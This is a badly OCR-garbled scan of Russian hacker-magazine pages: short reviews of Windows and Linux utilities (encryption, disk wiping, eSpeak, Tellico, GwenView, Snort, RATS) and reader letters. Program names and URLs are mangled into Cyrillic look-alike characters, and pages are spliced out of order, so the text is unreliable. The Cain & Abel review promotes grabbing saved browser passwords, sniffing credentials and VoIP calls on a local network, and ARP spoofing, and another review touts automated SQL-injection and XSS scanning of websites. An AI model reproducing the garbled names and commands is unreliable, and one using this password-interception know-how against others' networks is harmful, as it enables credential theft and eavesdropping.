ѴѴіпсІоѵѵз 2000/2003/М е/ХР/ѴізІа 
ЗИагеѵѵаге 
Зіге: 9286 Кб 
ѵѵѵѵѵѵ.саіізойѵоір.сот 




Весь бизнес перемещается в Интернет, где указаны телефоны 
фирмы. Настанет время, когда в отделы продаж и технической 
поддержки будут чаще «телефонить» по Зкуре‘у, а не по обычной 
медной проволоке. Мы тоже можем прикинуться воротилами ІТ- 
индустрии, настроив целую телефонную станцию в инете. Теперь 
можно принимать сообщения на Зкуре по прослушке записанно- 
го тобой приветствия, настроить перевод звонков относительно 
заданных юзером тонов или сказанных слов. Получив послание, 
система сумеет оповестить тебя мылом, перезвонить, куда следу- 
ет, или просто прочитать заданный тобой текст, если звонящий 
не достоин личного подхода ;). СаІІ ЗоШ ѴоІР приводит к тотальной 
автоматизации интернет-звонков. Все душевные порывы уходят на 
выбор скинов, которые успешно поддерживаются прогой. 



СІІЕЗрШегО.6 ВеІаЗ 

ѴѴіпсІоѵѵз 95/98/Ме/2000/2003/Ме/ХР/ѴізІа 

Ргееѵѵаге 

Зіге: 931 Кб 

сие-зріідег.епііз.іі; 

Скачиваешь любимое музло и потом колупаешься, отыскивая 
нужную песню из 70-минутного трека? Да, гадкие рипперы ленятся 
резать альбомы на треки; в борьбе за компактность они оставля- 
ют нас с громоздкими файлами. Здесь помогут лишь СІІЕ-файлы, 
которые могут содержать информацию по нарезке альбома в от- 
дельные треки: длительность песни, последовательность треков 
в оригинале и так далее. Увы, не всякий рипперский софт создает 
искомые информативные файлы, но проги вроде ЕАС, ВРМ Зіисііо, 
СОРѴѴіп и Ѳоісіѵѵаѵе справляются с этим на отлично. К сожалению, 
пока поддерживаются только трЗ, тогда как ѴѴМА остается за бор- 
том прогресса назло дядюшке Билли. 




МоЬіІеТСР 1 .2 Веіа 

ѴѴіпсІоѵѵз 95/98/Ме/2000/2003/Ме/ХР/Ѵізіа 

Ргееѵѵаге 

Зіге: 1383 Кб 

ѵѵѵѵѵѵ.кІоскІогпеІ.сот/ИітІ/ргобисІз/тоЬіІеІср.рІір 



МаЫіе ІСР $еШп^ 



Рогшагсііпд бепегаі РШРЗ СИеск 



Мексика 

Воаігеат А05І_ 
ТеІіаАОЗЬ 
ВгесІЬапсІаЬоІадеІ: #1 
ВгесІЬапсІаЬоІадек #2 
Т еііа РазІІіпа 
Нуре 

Теііа ВгесІЬапсІ 



Представь ситуацию. У тебя есть ноутбук, которым ты пользуешь- 
ся в институте, дома и на работе. Дома у тебя ѴѴі-Рі, а на работе ты 
подключаешься к инету при помощи кабеля. Каждый раз вручную 
забивать все настройки — жуткий геморрой! Лечить мы его будем 
при помощи программы МоЬіІе ТОР. Одной из главных проблем 
при переезде с ноутом на новое место остается переключение на 
ЗМТР-сервер, который окажется доступен в используемой сети. 
Переключение может осуществляться как автоматически, так и 
вручную, когда прога выдаст полный список использованных то- 
бой почтовых серверов и напомнит, каким из них ты пользовался 
в конкретной сети. Кто-то возразит, что использование локально- 
го ЗМТР окажется более элегантным решением. Так будет одно- 
значно проще, но в современном мире строгих антиспам-филь- 
тров почта, отправленная с локального хоста, в 50-ти процентах 
случаев признается спамом. Обойти обыкновенные почтовики 
все еще непросто, но МоЬіІе ТСР тебе в этом поможет. 
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СгурЮР 5.0| 

МісгозоЙ ѴѴіпбоѵѵз 98/983 Е/М Е, ѴѴіпбоѵѵз N172000/2003, ѴѴіпсІоѵѵз ХР 

Размер: 5,1 Мб 

ЗНагеѵѵаге 

ѵѵѵѵѵѵ.сгуріссі.сот 








Іінр**- ипякгн 1ЖМ щеій№( I И- 



СгурЮР — программное приложение, которое позаботится об 
информационной безопасности не самым обычным способом. 
«Секретные» файлы обрабатываются, скрываются и шифруются 
программой «портативно». Обычно программы данного класса 
не скрывают наличие зашифрованной информации, чем могут 
вызвать вопрос из серии «а что он там такое зашифровал?». В 
СгурЮР же данные не только зашифрованы, но и упакованы в 
спецконтейнер — баі-файл. Такой контейнер содержит внутри 
себя целую кучу самых разных файлов, не давая шпионам ника- 
кой информации о том, что именно лежит в данном контейнере, 
где начинается и кончается файл и что вообще делать с этим 
набором данных, даже если их и удастся распаковать. Назначив 
определенные данные «секретными», программа запишет их на 
ничем не примечательный СР или РѴР-диск, портативно все упа- 
ковав и зашифровав. 

Как только такой диск создан с помощью СгурЮР, можно пользо- 
ваться им на любом другом компьютере, зная пароль доступа. В 
процессе работы с данными СгурЮР они копируются и расшиф- 
ровываются во временный каталог. По окончании работы с фай- 
лом он автоматически удаляется из системы. Версия программы 
СгурЮР Рогепзіс создана специально для агентств правоприме- 
нительной деятельности и правительства, что гарантирует неко- 
торую криптостойкость. В данной версии есть удобная возмож- 
ность создавать неограниченное число пользователей и паролей 
на папку и/или файл. Различные уровни доступа можно назначить 
в зависимости от потребностей в безопасности определенных 
пользователей. Реализован поиск по номеру ІР, имени, названию 
файла. К каждому файлу и папке можно прикрепить информацию 
со специальным примечанием. Ну и стоит, конечно, помнить, что 
специальных бэкдоров в программе нет, так что, забыв свой собс- 
твенный пароль и не будучи знаменитым криптографом, можно 
забыть про собственные секретные данные :). 
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ОекаП Ргіѵаіѳ Оізк 2.07 

МісгозоП ѴѴіпсІоѵѵз 98/988 Е/М Е, ѴѴіпсІоѵѵз ЫТ/2000/2003, ѴѴіпсІоѵѵз ХР 

Размер: 1,15 Мб 

ЗНагеѵѵаге 

ѵѵѵѵѵѵ.бекагі.сот 




Альтернатива предыдущей программе — ОекаП Ргіѵаіе Оізк (рус- 
ская версия интерфейса имеется). Программа характеризуется 
как легкое в использовании, надежное и мощное средство для 
защиты значимой информации. Она предназначена для пользова- 
телей любого уровня «продвинутое™», даже для не имеющих ни- 
каких специальных знаний в области защиты информации. ОекаП 
Ргіѵаіе Оізк обеспечивает надежную защиту, удобство использова- 
ния, мобильность и всю необходимую функциональность. Удобный 
интерфейс позволяет эффективно и быстро работать с зашиф- 
рованными данными каждый день. Программа позволяет защи- 
щать информацию на жестких дисках и сменных носителях, таких 
как дискеты, СО, СО/Р, СО/РѴѴ, МО, МО, 2ІР-диски, флеш-диски и 
так далее. Даже в случае кражи или утери ноутбука или носителя 
важной информации можно быть в некоторой степени уверенным, 
что данные надежно защищены и не будут прочитаны. В процессе 
работы программа создает зашифрованные файлы-контейнеры. 
Они представлены в виде логических дисков операционной систе- 
мы ѴѴіпсІоѵѵз. Пользователь работаете диском также, как с любым 
системным. Вся информация, которая прячется наэтихлогических 
дисках, хранится в зашифрованном виде. Чтобы получить доступ 
к данным на «секретном» диске, нужно ввести пароль, предвари- 
тельнораспечатанный и повешенный на монитор. Как утверждает 
статистика, этот самый пароль является слабым местом в любой 
криптосистеме. 



МісгозоЙ ѴѴіпсІоѵѵз 98/988Е/МЕ, ѴѴіпсІоѵѵз ЫТ/2000/2003, ѴѴіпсІоѵѵз ХР 
Размер: 92 Кб 
Ргееѵѵаге 
м/ѵѵѵѵ. гард еі. сот 




За последние годы «перевалочные» файловые хранилища рас- 
пространились по Сети со страшной силой. Удобно же: выложил 
файл натакой сервер, разослал всем желающим или опубликовал 
ссылку — и можешь не волноваться про хостинг или свободное 
место. Однако владельцы таких сервисов, конечно же, не упустят 



возможности подзаработать на так называемой «халяве» и пото- 
му чинят кое-какие (впрочем, с этим можно и смириться) препятс- 
твия любителям тотального выкачивания всего и вся. Лучше чтобы 
все скачивалось автоматизировано. Программа РарОе! (сокра- 
щенно от РАРібезИагеСЕТ) предназначена для автоматической 
загрузки файлов с известного файлового сервера гарісізііаге.сіе. 
Можно сказать, что это ее основное предназначение. Но кроме 
гарісізііаге.сіе , программа поддерживает целую обойму подобных 
серверов: теааиріоаб.сот . зехиріоабег.сот . тѵіетрбіг.сот . зііі. 
Ш, зепсізрасе.сот . ШгЬоирІоаб.сот . ахііііе.сот . Иѵрегиріоаб.сот . 
аеШе.Ьіг . сІерозіШез.сот . ѵѵеЫіІе.ги . 1іІе2зНаге.ЬІ2 . гарібиріоаб. 
сот , ѵоигіііе.ога . ѵоиіТіІеНозІ.сот . то есть поддерживает автома- 
тическую загрузку с 16-ти серверов. Программа маленькая и бес- 
платная, а также в РарѲеІ существует возможность одновремен- 
ной закачки с нескольких серверов. 

В текущей версии выявлен досадный, но не критичный баг: если 
папка для закачки не существует, то файлов ты не найдешь. Реше- 
ние: создать папку вручную. В следующей версии, по заверению 
автора Александра Ширяева, все будет исправлено. 

ОЬіесіѴѴіре 1 .3 

МісгозоП ѴѴіпсІоѵѵз 98/988Е/МЕ, ѴѴіпсІоѵѵз N1/2000/2003, ѴѴіпсІоѵѵз ХР 

Размер: 1 ,7 Мб 

ЗНагеѵѵаге 

ѵѵѵѵѵѵ.оЬіесІгезсие.сот/гиз 




Программа ОЬіесіѴѴіре — еще одна составляющая пассивной ин- 
формационной безопасности. Если не умничать, то она предназна- 
чена именно для окончательного заметания следов на информаци- 
онных носителях, с которых некие важные данные были удалены. 
Однако то, что файл просто удален — ничего не гарантирует. 
Умельцы запросто восстановят стертое, а дальше уже возможны 
варианты... Чтобы таких вариантов не было, нужно уметь «отрубать 
концы». То есть, удалив что-то, нужно на освободившееся место 
записать что-нибудь другое, уже не позволяющее «откатиться» на 
шаг-другой назад. ОЬіесіѴѴіре — как раз подходящее программное 
решение для наших условий. Утилита позволяет стирать файлы, 
диски и незанятое дисковое пространство таким образом, что вос- 
становление информации оказывается невозможным. По выбору 
программа способна использовать быстрый или надежный алго- 
ритм стирания. Файлы и папки могут быть объединены в списки и 
стерты заодну-единственную процедуру. Поддерживаются файло- 
вые системы РАТ и ЫТРЗ. ОЬіесіѴѴіре стирает файлы и папки, удаля- 
ет данные на дисках и картах памяти, автоматически форматирует 
носитель после стирания информации, очищает неиспользуемое 
пространство на диске и позволяет использовать несколько самых 
разнообразных алгоритмов удаления от стандартных до суперэф- 
фективных, которые даже прошли государтсвенную сертифика- 
цию. Тут имеются в виду алгоритмы Оой 5200. 22М (8-306. / Е) и ОоО 
5200. 28М (8-306. / Е, С и Е), эффективность которых проверена 
суровыми дядями из министерства обороны США. 

Особенным гурманам предлагается удалить свои данные при по- 
мощи алгоритма Питера Г утмана. Информация при таком подходе 
заменяется числами из специальной таблицы, причем данные для 
надежности перезаписываются 35 раз. 
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ПЕТР СЕМИЛЕТОВ / ШШШ.ЕОЖТОН.ШЛЕМЛЗА / 



ІІІЧІХѴѴАРЕ2 




ІЕЗреакИ 

РОЗІХ(*ВЗО, Ыпих, Зоіагіз...) 
Размер (исходник в 2 Ір): 31 3 Кб. 
ИДр://ѳзреак.зоигсѳІогде.пе1 
Лицензия: ОШ ОРБ 




До сих пор в мире І_іпих я знал только один синтезатор речи — зна- 
менитый Резііѵаі. А недавно открыл для себя еще один — Зреак ( на 
ЗР проект называется ЕЗреак). Он меньше, чем Резііѵаі, и устанав- 
ливается из исходника без каких-либо проблем. Для обеспечения 
звукового вывода используется библиотека РоіТАисІіо. Она может 
быть уже установлена, если у тебя есть Аибасііу. Кроме самой биб- 
лиотеки, нужен пакет с ее заголовками. 

В каталоге исходника лежит одинокий такеіііе, то есть, чтобы 
собрать проект, не надо запускать скрипт сопіідиге — достаточно 
просто дать команду таке. Однако этот подготовленный заранее 
такеіііе не поддерживает цель іпзіаіі, и команда таке іпзіаіі не 
сработает. Надо установить части скомпилированной программы 
вручную. 

Как? Очень просто. Сам бинарник зреак надо скопировать в види- 
мый для системы каталог бинарников, например в /изг/ІосаІ/Ьіп. В 
каталоге исходников есть также директория зреак-баіа. Ее нужно 
скопировать в /изг/зііаге, чтобы у тебя получился катал оѵ/изг/зЬаге/ 
зреак-баіа, либо в домашний каталог, чтобы в итоге получился та- 
кой путь к файлам голоса: -/зреак-баіа. 

Пока Зреак поддерживает только английский язык, а также в экс- 
периментальном режиме — немецкий и эсперанто. Есть несколько 
голосов, из которых два основных — мужской и женский англий- 
ские. Мужской включен по умолчанию. Чтобы включить женский, 
надо использовать параметр «-ѵ еп-І». Выходит так, будто некая 



тетенька говорит, зажав пальцами нос. Но тембры звучат живее, 
эмоциональнее, чем в Резііѵаі. 

Чтобы попросить реак проговорить текстовый файл, надо дать ко- 
манду: 

# зреак имя файла 

Зреак довольно бодро и разборчиво прочитал мне тексты песен 
группы ІЧігѵапа из обычных текстовых файлов. Программа может 
работать в интерактивном режиме. Просто даешь команду зреак и 
в ней набираешь текст. После каждого нажатия на Епіег, програм- 
ма говорит набранную строку. 

Другие способы работы со Зреак. Проговорить некий текст с помо- 
щью Зреак можно, перенаправив в Зреак вывод другой програм- 
мы. Например, слово «НеІІо» воспроизведем так: 

#есНо "ЬеІІо" I зреак 

А чтобы прикрутить зреак к речевой системе КОЕ — КОЕ ТехМо- 
ЗреесН (КТТЗ), надо в настройках КТТЗ задать команду (там, где 
задается команда воспроизведения речи): 

# саі %і I зреак — зісііп -ѵѵ %ѵѵ 

Посмотрим еще на несколько интересных параметров Зреак: 

-а <уровень громкости> — по умолчанию 10, может быть от нуля 
до 20. 

-з ссколько слов в минуту> — по умолчанию 160. 

-I <пауза между строками> — ноль по умолчанию. 

-ѵѵ <имя ѵѵаѵ-файла для вывода> — запись голоса в волновой 
файл. 

Кроме того, существуют опции управления голосом, например 
формантами (частотами, присущими человеческому голосу), но 
эти подробности читай в документации. 

Зреак производит очень хорошее впечатление, и можно предпо- 
ложить, что скоро он станет по популярности вровень с Резііѵаі или 
даже опередит его. 



ТеІІісо 

РОЗІХ (*ВЗО, Еіпих, Зоіагіз...) 

Размер (исходник в іаг.д т)\ 3,6 Мб. 

ІіНр://ѵѵѵѵѵѵ.регіар5І5. огдЛеІІісо/| 

Лицензия: ОШ (ЗРБ 

Быстрая и удобная программа для ведения коллекций книг, игр, му- 
зыкальных дисков, фильмов и т.д. Написана на С++ с заточкой под 
КОЕ. Для ведения базы данных используетХМБ, а не модный нынче 
МуЗОБ. Для создания коллекций есть набор удобных шаблонов. 
Раньше я вел список своих игр в таблице Ѳпитегіс, но теперь пере- 
несу его в ТеІІісо. Так удобнее, да и скриншоты можно хранить. 

Но первым делом мне хотелось проверить, как ТеІІісо умеет само- 
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надо сделать так: 






#тосІргоЬесриісІ 

Потому что без модуля сриісі (он есть в твоем Ыпих'е) программа 
сриісі работать не будет. Прошу не путать «ядерный» модуль сриісі с 
одноименной программой. Потом надо просто запустить програм- 
му СРІІісІ из консоли, и она заполнится страницами информации 
о процессоре. Не надо расшифровывать маркировку на «камне» ! 
Купил у барыги набазаре процессор, принес домой, поставил, про- 
верил, огорчился. Вот для чего эта программа. 



ОѵѵепѴіеѵѵ 

Р03ІХ(*В80, 1_іпих, Зоіагіз...) 
РАЗМЕР (исходник в іагЬт.2): 2,4 Мб. 
ИДр://д\А/епѵіе\д/.зоигсеІогде.пе1 
Лицензия: ОШ (ЗРІ_ 



стоятельно заполнять поля в коллекции фильмов: скачивать ин- 
формацию о режиссерах, актерах, наконец, обложку. И в самом 
деле, поручив программе скачать данные из Сети, я некоторое вре- 
мя наблюдал, какТеІІісо скачивает файлы. Судя по их названиям, 
это были нужные файлы — обложки и текстовые данные о филь- 
мах. Однако после завершения скачивания поля остались пусты. 
Между тем информация полей, включая картинки, сохраняется, 
если вводить эту информацию вручную. 

Работаетимпортколлекцийиздругихформатов,напримерѲСРіІтз 
(об этом менеджере фильмом я уже писал), и распространенных 
форматов вроде ВіЬТех, СЗѴ (разделенные запятыми поля) и мно- 
гие другие. 

В ТеІІісо есть поисковая система и всякие фильтры. Думаю, это 
одна из лучших программ для тех, кому надо хранить в упорядо- 
ченном виде какие-либо данные. Чуть не забыл! Если ты устанав- 
ливаешь ТеІІісо из исходника, то оптимально настроить программу 
перед сборкой можно так: 

./сопіідиге -бізаЫе-беЬид -епаЫе-ІіпаІ 




г- — "Г 



Кстати, в отличие от многих КБЕ-программ, ТеІІісо компилируется 
очень быстро. И при наличии нужных заголовочных файлов (в ос- 
новном от разных частей КОЕ) проблем со сборкой не возникнет. 



СРІІісІ 



РОЗІХ(*ВЗО, І_іпих, Зоіагіз...) 
Размер (исходник в Іаг.д т)\ 27 Кб 
И и р ://\л/ѵѵ\л/ . еіаі I е п . со т 
ВЗО-подобная лицензия 




Хорошая утилита. В подробностях расскажет и покажет, какой у 
тебя процессор. Такое даже ЗіЗоЙ Запбга не делает. Но сначала 



Не понимаю, почему ОѵѵепѴіеѵѵ еще не стала программой для про- 
смотра изображений по умолчанию в КОЕ, ведь все предпосылки 
к этому есть. Нет, не то чтобы ОѵѵепѴіеѵѵ была чемпионом по под- 
держке форматов — на самом деле она умеет отображать файлы 
только тех графических форматов, которые поддерживаются биб- 
лиотекой Оі (а также КОЕ через КРагІз и файлы от ОІМР). Архитек- 
тура программы и интерфейс вызываютуважение. Все продумано. 
Все удобно. 

Например, миниатюры можно масштабировать как тебе заблагорас- 
судится — для этого в секции миниатюр есть ползунок наверху. Та- 
щишь его и масштабируешь. Далее в наличии имеется удобная функ- 
ция: можно установить обои на рабочем столе КОЕ прямо из ОѵѵепѴіеѵѵ. 
Надо сказать, эту функцию я давно искал в других программах. Потому 
что выбирать обои в стандартном окне из выбора в настройках КОЕ не 
совсем удобно, особенно если обоев много. 

Следуя стандартам ЕгееРезкІор.ога . ОѵѵепѴіеѵѵ поддерживает разде- 
ляемую базу хранения миниатюр. Из других программ, которые рабо- 
тают с той же базой, навскидку могу назвать ООѴіеѵѵ и ТЕА. 

Среди манипуляций с изображениями ОѵѵепѴіеѵѵ предоставляет две 
наиболее часто используемые - поворот и зеркальное отражение. 
ОѵѵепѴіеѵѵ тесно взаимодействует с различными сервисами КОЕ, в 
частности с КІО. Благодаря КІО-модулям ОѵѵепѴіеѵѵ может прозрачно 
«заходить» в архивы. А 4РЕ0'и можно очень быстро снабжать коммен- 
тариями (ЕХІЕ-данные), вводя их в небольшой редактор под панелью, 
где отображается картинка. Понятен и прост режим слайдшоу. 
Единственное, что несколько напрягает, так это мини-окошко в пол- 
ноэкранном режиме. В этом окошке — кнопки для перемещения 
вперед/назад и кнопка выхода из полноэкранного режима. Впрочем, 
после некоторых изысканий обнаруживается, что мини-окно можно 
отключить, нажав Епіег, либо из контекстного меню. И еще хотелось 
бы, чтобы ОѵѵепѴіеѵѵ запоминал последнюю просмотренную директо- 
рию. Впрочем, этого не делает и ООѴіеѵѵ — стало быть, простительно. 
Не ошибусь, сказав, что в *піх есть две «смотрелки» такого класса 
— ООѴіеѵѵ и ОѵѵепѴіеѵѵ. 
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Если ищешь утилиту для восстановления всевозможных паролей, 
то лучшего инструмента тебе, пожалуй, не найти. Этот универ- 
сальный солдат в буквальном смысле готов на все. Допустим, тебе 
нужно извлечь пароли и личные данные, сохраненные в браузере. 
Не проблема. Клик по нужной иконке — и они твои. Интересуешь- 
ся пассами, которые непрерывно передаются по твоей локалке? 
В этом случае воспользуйся встроенным снифером. Правда, для 
этого понадобится драйвер ѴѴіпРсар, но не беда — в случае необ- 
ходимости Саіп & АЬеІ заинсталлит его прямо во время установки. 
А далее делай, что хочешь. 

Замечу, что дело не ограничивается одним лишь перехватом паро- 
лей от всевозможных сервисов, начиная от банальных РТР/РОРЗ 
и заканчивая экзотикой, вроде ключей для Рабіиз-серверов. Не- 
сложно перехватить идентификационные данные для клиентов 
ѴоІР-телефонии (но только в случае, если используется ЗІР-про- 
токол) или даже пакеты с голосовыми данными, из которых легко 
извлечь запись разговора с помощью специальных конвертеров. 
Чтобы не было проблем с коммутаторами, прога отлично владеет 
приемом АРР-спуфинга. Умелые манипуляции с МАС-адресами и 
заголовками пакетов приводят к результатам: снифер работает 
почти безотказно. Саіп&АЬеІ может взломать 25 типов хэшей, про- 
вести исследование беспроводной сети, а также выполнить еще 
целый ряд уникальных действий, нацеленных прежде всего на под- 
бор или расшивку паролей с помощью 15-ти встроенных утилит. 
Впечатляет? Меня — тоже. 

Еще одна любопытная деталь. В начале этого года президент США 
Джордж Буш решил проведать свои силовые ведомства и невзна- 
чай заглянул в Агентство Национальной Безопасности (ЫВА). На 
одном из снимков виднеется огромный экран, а на нем — список 
самого актуального хакерского софта. В этом списке, помимо ле- 
гендарных ІЧтар, ІЧеззиз, ЕіИегеаІ, есть и Саіп & АЬеІ. Аэто о многом 
говорит. 



РРѴ8 1 .3 (Ветоіе РНР ѴиІпегаЬіІіІу Зсаппег) 

ѴѴіп 9х/І\ІТ/2к/ХР 
ОрепЗоигсе 
Зіге: 377 Кб 
оѵегбозе.ІсрГеат.огд 
Зеркало: 

ИДр://таІІос 2 его\л/іскеба 11 іІибе.пе\д/.Іг/грѵзіпз 1 аІІ.ехе 

Мы уже не раз обсуждали утили- 
ты, которые позволяют скани- 
ровать удаленный хост и искать 
на нем дырявые РНР-сценарии. 
Однако используемый ими при- 
нцип — тупой поиск уязвимого 
файла по специальной базе 
— малоэффективен. Тулзы, 
которые позволяют играть с 
параметрами скриптов, в боль- 
шинстве своем являются полу- 
автоматическими и требуют от 
пользователя непосредствен- 
ного участия. Наконец-то я могу 
представить полностью авто- 
матическое средство — сканер 
РРѴЗ. Право, не программа, а 
настоящая находка! Утилита 
позволяет оперативно просканировать сайт и проверить найден- 
ные РНР-сценарии на наличие всевозможных уязвимостей, в том 
числе все виды сгозз зке зсгірНпд, ЗОБ-инжекции, раскрытия инс- 
талляционного пути, уязвимостей подключения файлов функциями 
— іпсІибе()иІореп(). По большому счету она выполняетте же самые 
действия, что делал бы и ты. То есть ищет подозрительные сцена- 
рии и начинает экспериментировать с параметрами, которые ей 
передаются. И если с твоей стороны вполне возможно что-то упус- 
тить, то РРѴЗ сделает все как надо. Ни один скрипт не останется 
незамеченным, а спецсимвол — непоставленным. В случае необ- 
ходимости можно использовать разные режимы работы (быстрый, 
доскональный и др.), различные виды запросов (поддерживается 
и ОЕТ, и РОЗТ). 




Зпоіі 2.4.3 

РОЗІХ 

ОІ\ІІІ(ЗРІ_ 

Зіге: 2,69 Мб 

біір ://з п о П-ѵѵі ге I езз . о гд/ 

Для того чтобы оградить свою сеть от внешних вторжений, админ 
делает, по крайней мере, две вещи. Первое — мастерски конфи- 
гурирует файрвол и систему в целом, своевременно устанавливая 
всевозможные обновления для ядра и используемого софта. И 
второе — обустраивает систему обнаружения вторжений. О такой 
системе и поговорим. За несколько лет существования хорошо 
себя зарекомендовалаутилитаЗпогБ Это не просто тупая програм- 
ма, которую разработчики запрограммировали на обнаружение 
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Аренда виртуального 
выделенного сервера 
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определенных типов атак. Зпогі — довольно гибкая система, ко- 
торая умеет мыслить. Тулза в реальном времени следит за трафи- 
ком и отслеживает все сетевые пакеты. А благодаря возможности 
анализировать различные протоколы, ей удается отлавливать са- 
мые разнообразные типы атак. В том числе: переполнение буфе- 
ра, скрытого сканирование портов, атаки на СОІ-сценарии, атаки 
ЗМВ, определения версии ОС (03 Ііпдегргіпііпд) и многие-многие 
другие. Да и вообще, ее можно обучить всему. Зпоіі использует 
очень гибкий язык правил и скриптов, которые четко регламен- 
тируют, какой трафик должен быть пропущен, а какой — забло- 
кирован. Тебе не обязательно составлять их самому — для этого 
есть вспомогательные средства. Например, пакет ЗпогГ-ѴѴігеІезз 
( зпогі-ѵѵігеіезз.огд ) активно используется для защиты беспровод- 
ных 802.11 сетей и является прямым конкурентом навороченным 
коммерческим продуктам типа Аігйеіепзе ( ѵѵѵѵѵѵ.аігбеІепзе.пеО . 
Примечательно, что Зпоіі в реальном времени реагирует на напа- 
дения и выполняет запрограммированное для него действие. Мож- 
но, например, записать событие в системный лог или отправить 
сообщение администратору. 



ВАТЗ - ВоидН АибШпд ТооІ Тог Зесигііу 

Кроссплатформенная 

0Ш0Р1_ 

Зіге: 175 Кб 

ИДр://\А/\А/\л/.зесигезоЙ\л/аге.сот/гезоигсез/боѵѵпІоаб_гаІз.Ті1:тІ 




Любая, даже самая опытная команда программистов допускает 
ошибки в коде. Часть из них некритична и грозиттолько нестабиль- 
ностью программы. Другие, напротив, позволяют инжектировать 
шелл-код и выполнять произвольные команды на удаленном сер- 
вере. Особый риск в коде представляют команды, позволяющие 
выполнить ЬиТТег оѵегііоѵѵ и другие похожие типы атак. Таких ко- 
манд очень много: это функции для работы со строками (хз1гсру(), 
зІгсаІ(), де1з(), зргіпТТ(), ргіпТТ(), зпргіпТТ(), зузІодО), системные ко- 
манды (ассеззО, сНоѵѵп(), сНдгр(), сИтоб(), ТтрТіІе(), 1трпат(), 
Іетрпат(), ткІетрО), атакже команды системных вызовов (ехес(), 
зузІет(), рореп()). Вручную исследовать весь код (особенно если 
он состоит из нескольких тысяч строк) довольно утомительно. А 
значит, можно без труда проглядеть передачу какой-нибудь фун- 
кции непроверенных параметров. Значительно облегчить задачу 
могут специальные средства для аудита, например утилита ВАТЗ 
(Воидб АибШпд ТооІ Іог Зесигііу). Она не только успешно справится 
с обработкой кода, написанного на С/С++, но сможет обработать 
еще и скрипты на РегІ, РНР и РуіИоп. В базе утилиты находится 
внушающая подборка с детальным описанием проблемных мест 
в коде. С помощью анализатора она обработает скормленный ей 
сорец и попытается выявить баги, после чего выдаст информацию 
о найденных недочетах. В некоторых случаях ты даже сможешь по- 
лучить рекомендации по решению проблемы. 

ВАТЗ работает через командную строку как под ѴѴіпбоѵѵз, так 
РОЗІХ-платформами. В обоих случаях необходимо дополнительно 
установить ХМЬ-парсер Ехраі ( ехраі.зоигееіогде.пеі ). 
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Александр Постников 
розіаіехі 6@гатЫег.ги 

Здравствуй, уважаемая редакция журнала <Хакер> ! 

Столкнуться с вашим детищем мне пришлось в детской посел- 
ковой библиотеке в читальном зале. Как все-таки хорошо, что го- 
сударство выделяет деньги на подписку журналов, абиблиотекари 
выбирают из них актуальное. 

//вырезано 

Но огорчает лишь наличие непонятных для обычного человечес- 
кого уха слов. Вам писали по этому поводу в предыдущем номе- 
ре, но Вы лишь отписались: спусть уж лучше ламеры потихоньку 
прогрессируютъ Да, это может и шутка, но не проще ли решить 
проблему простым способом — разместить в конце журнала (ну 
или где удобней Вам) краткий словарь <хакерских> слов. Ну, или 
на худой конец просто написать ссылку, где такой словарь можно 
скачать. Это вообще пару строк займет! Того и гляди, на самом 
деле, наступит мозговой прогресс ламеров! Но проблема, навер- 
няка, состоит в том, что вы используете компьютерный слэнг для 
упрощения понимания смысла текста. На самом же деле проис- 
ходит обратный процесс. Ведь ежедневно этот слэнг пополняется 
словами сзамысловатым произношением, и человек, будь то хакер 
или ламер, зачастую не успевает обогатить свой словарный запас 
ими. Ведь то же самое слово <деньги> можно услышать в разных 
местах, от разных лиц, и как <ловэ>, и как<бабло>, и как<бабки>. 
Но смысл слов одинаков. Поэтому надо просвещать людей в этом 
плане, и не делить их на хакеров и ламеров! 

Спасибо за внимание! Надеюсь, Вы примите мой совет в долж- 
ной мере, без пафоса и глобального высмеивания. Желаю Вам от 
чистого сердца процветания и долголетия! 

НО ОГОРЧАЕТ ЛИШЬ НАЛИЧИЕ НЕПО- 1 
НЯТНЫХ ДЛЯ ОБЫЧНОГО ЧЕЛОВЕЧЕС- 
КОГО УХА СЛОВ. ВАМ ПИСАЛИ ПО ЭТО- 
МУ ПОВОДУ В ПРЕДЫДУЩЕМ НОМЕРЕ, 

НО ВЫ ЛИШЬ ОТПИСАЛИСЬ 

Привет, Александр! Мы, знаешь ли, и сами по большей части сель- 
ские жители — тайные вредители. Простые мы люди, такие как 
мы с тобой, такие, как у нас на каждом шагу. Бывало, выйдешь 
утречком из избы, роса еще не опала, затянешься цигаркой, сядешь 
на завалинку, пустишь пару дымных колец в небо — и так хорошо 
становится! Душа разворачивается! Проведешь мозолистой ладо- 
нью по травушке-муравушке — и вперед, трудиться в поте лица. 
То, видишь ли, свекла заколосилась, то коза опоросилась, а ежели 
дождь во время усушки? Такие дела. Пьем мы, бывало, горькую в 
такие моменты. Достанет нам баба Маша из колодца прохладного 
белого квасу — им и запиваем. А потом, как водится, мы до полу- 
дня в гамаке лежим, пение цикад слушаем. А под вечер выползаем 
в сельский клуб, он у нас под редакцию переоборудован. Там мы 
изобретаем нелепые слова, которые потом печатаем в своем жур- 
нале. Тех, кто их не понимает, мы называем «ламерами», а они, 
бывает, оторвут пару штакетин из забора — и ну махать ! Но и мы не 
промах, кулачному бою нас не зря дедушка учил. Враз кого хоче шь 
отметелим! Пусть их хоть в десять раз больше, к нам не задирайся! 

Р.5. Кстати, мы переправили твой вопрос в сельсовет области 
(районный не справился). Оттуда пришел приказ: всей деревне 
имени Пламени Революции научится пользоваться поисковы- 
ми системами. Оказывается, еще в 1997-м году был выпущен 
словарь компьютерных терминов (с программной оболочкой), 
а сколько их сейчас. . . 



Виталя Петров 
апІіІатѳг_позрат@таіІ.ги 

Даров Х-Сгеѵѵ! Недавно решил прошманать старые архивы журна- 
ла (электронные, в НТМІ_), и чего-то такая ностальгия на меня напа- 
ла. .. У самого меня комп всего полтора года, так что вы даже не пред- 
ставляете, как я вам завидую, что вы смогли застать время расцвета 
компьютерного андеграунда. Как бы я сам хотел побывать в 95-2004 
годах. Бел и только вспомнить, какая атмосфера царила в это время. 
К примеру, в 62 номере, увидел статью про ЭаІІМе!, там было описа- 
но золотое время канала #ХАКЕР, тогда была возможность пооб- 
щаться действительно с умными людьми, не то что сейчас — куда 
не зайди, либо обматерят, либо начнут приставать со своими ламо- 
размами. Все изменилось, нет ни прежних хак-тус, ни того уважения 
друг к другу что раньше, абсолютно ничего! Единственное место, 
где еще сохранились остатки прежней атмосферы (без толп ламе- 

У САМОГО МЕНЯ КОМП ВСЕГО ПОЛТО- 
РА ГОДА, ТАК ЧТО ВЫ ДАЖЕ НЕ ПРЕД- 
СТАВЛЯЕТЕ, КАК Я ВАМ ЗАВИДУЮ, ЧТО 
ВЫ СМОГЛИ ЗАСТАТЬ ВРЕМЯ РАСЦВЕ- 
ТА КОМПЬЮТЕРНОГО АНДЕГРАУНДА 

